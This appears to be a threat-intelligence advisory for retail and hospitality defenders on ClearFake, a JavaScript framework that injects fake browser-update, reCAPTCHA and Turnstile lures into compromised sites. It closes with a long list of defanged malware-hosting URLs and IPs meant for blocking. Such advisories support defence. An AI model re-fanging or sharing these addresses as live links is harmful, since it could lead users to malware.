Context
Sekoia researchers have released updates on ClearFake, a malicious JavaScript framework that infects compromised websites to deliver malware through drive-by downloads and social engineering tactics. Initially observed in July 2023, ClearFake utilized fake browser update prompts to trick users into downloading malware. The latest 2025 variant introduces new lures, including fake reCAPTCHA and Cloudflare Turnstile verifications, to deceive users into executing malicious PowerShell commands. ClearFake continues to rely on EtherHiding, a technique that leverages Binance Smart Chain smart contracts to store and retrieve payloads, making its infrastructure difficult to disrupt. The framework has been observed distributing Lumma Stealer, Emmenhtal Loader, and Vidar Stealer, posing a significant global cybersecurity threat.
Community Impact
The latest ClearFake attacks updates pose a serious risk to the retail and hospitality sectors, particularly e-commerce platforms and hotel booking websites that depend on WordPress and other CMS platforms. By injecting malicious JavaScript into compromised websites, ClearFake can deceive customers into downloading malware disguised as security updates or resolving fake technical issues. As such, RH-ISAC Core Members are advised to maintain situational awareness on updated tactics and capabilities for malware like ClearFake and are advised to review the intelligence and indicators of compromise, below, included in this report.
Technical Analysis
ClearFake represents an evolution in JavaScript-based malware frameworks, incorporating Web3 technology and blockchain infrastructure to enhance persistence and evasion techniques. Unlike traditional drive-by downloads, ClearFake’s ClickFix lures deceive users into executing malicious PowerShell commands themselves, making it difficult for endpoint security solutions to classify these actions as malicious activity.
The use of Binance Smart Chain for payload hosting and AES key management is a significant advancement in cybercriminal infrastructure. Storing malicious scripts in Ethereum smart contracts makes removal nearly impossible since blockchain transactions are immutable. This decentralized hosting model ensures ClearFake remains operational even if C2 domains are taken down.
Additionally, Cloudflare Pages is being abused to host and encrypt malware payloads, adding an extra layer of obfuscation. The combination of JavaScript-based injection, blockchain interactions, and social engineering makes ClearFake a highly adaptable, scalable, and persistent cyber threat.
Indicators of Compromise
Sekoia researchers have provided the following IOCs for ingestion as the earliest possible convenience:
hxxps://ert67-o9.pages[.]dev/data
hxxps://f003.backblazeb2[.]com/file/skippp/uu.html
hxxps://f003.backblazeb2[.]com/file/skippp/index.html
hxxps://hostme.pages[.]dev/host
hxxps://ghost-name.pages[.]dev/website
hxxps://gdfg-23rwe.pages[.]dev/index.html
hxxps://sha-11x.pages[.]dev/
hxxps://b1-c1-k8.pages[.]dev/
hxxps://1a-a1.pages[.]dev/
hxxps://sdfwefwg.pages[.]dev/
hxxps://niopg.pages[.]dev/
hxxps://sdfwefwg.pages[.]dev/
hxxps://cleaning-devices-k.pages[.]dev/
hxxps://tour-agency-media.pages[.]dev/
hxxps://fresh-orange-juice.pages[.]dev/
hxxps://you-insk-bad.pages[.]dev/
hxxps://human-verify-7u.pages[.]dev/
hxxps://recaptcha-verify-me-1c.pages[.]dev/
hxxps://macos-browser-update-9n.pages[.]dev/
hxxps://macos-browser-update-5i.pages[.]dev/
hxxps://recaptcha-verify-2e.pages[.]dev/
hxxps://recaptcha-verify-7z.pages[.]dev/
hxxps://recaptcha-verify-1t.pages[.]dev/
hxxps://recaptcha-verify-9m.pages[.]dev/
hxxps://disable-data-collect-ai.pages[.]dev/
hxxps://recaptcha-verify-1r.pages[.]dev/
hxxps://recaptha-verify-5q.pages[.]dev/
hxxps://note1.nz7bn[.]pro/nnp.mp4
hxxps://ai.fdswgw[.]shop/one.mp4
hxxps://mnjk-jk.bsdfg-zmp-q-n[.]shop/1.mp4
hxxps://nbhg-v.iuksdfb-f[.]shop/ajax.mp3
hxxps://hur.bweqlkjr[.]shop/m41.mp4
hxxps://hur.bweqlkjr[.]shop/1a.m4a
hxxps://yob.yrwebsdf[.]shop/1a.m4a
hxxps://yob.yrwebsdf[.]shop/3t.mp4
hxxps://start.cleaning-room-device[.]shop/sha589.m4a
hxxps://discover-travel-agency.pro/joke.m4a
hxxps://discover-travel-agency.pro/walking.mp3
hxxps://discover-travel-agency.pro/1.m4a
hxxps://travel.image-gene-saver.it.com/1.m4a
hxxps://ads.green-pickle-jo[.]shop/1.m4a
hxxps://recaptcha-verify-4h[.]pro/kangarooing.m4a
hxxps://recaptcha-manual[.]shop/kangarooing.m4a
hxxps://recaptcha-verify-4h[.]pro/xfiles/kangarooing.vsdx
hxxps://recaptcha-verify-4h[.]pro/xfiles/verify.mp4
hxxps://human-verify[.]shop/xfiles/verify.mp4
hxxps://human-verify-4r[.]pro/xfiles/verify.mp4
hxxps://human-verify-4r[.]pro/xfiles/human.cpp
hxxps://dns-verify-me[.]pro/xfiles/train.mp4
hxxp://83.217.208[.]130/xfiles/Ohio.mp4
hxxp://83.217.208[.]130/xfiles/VIDA.mp3
hxxp://83.217.208[.]130/xfiles/VIDA.mp4
hxxp://83.217.208[.]130/xfiles/trip.mp4
hxxp://83.217.208[.]130/xfiles/trip.psd
hxxp://80.64.30[.]238/trip.psd
hxxp://80.64.30[.]238/evix.xll
hxxps://raw.githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll
hxxps://domain[.]com/BEGIMOT.xll
hxxps://disable-data-ai-agent.pages.dev
hxxps://tumbl.design-x[.]xyz/glass.mp3
hxxps://f003.backblazeb2[.]com/file/skippp/glass.mp3
hxxps://sandbox.yunqof[.]shop/macan.mp3
hxxps://microsoft-dns-reload-1r.pages[.]dev
hxxps://microsoft-dns-reload-5q.pages[.]dev
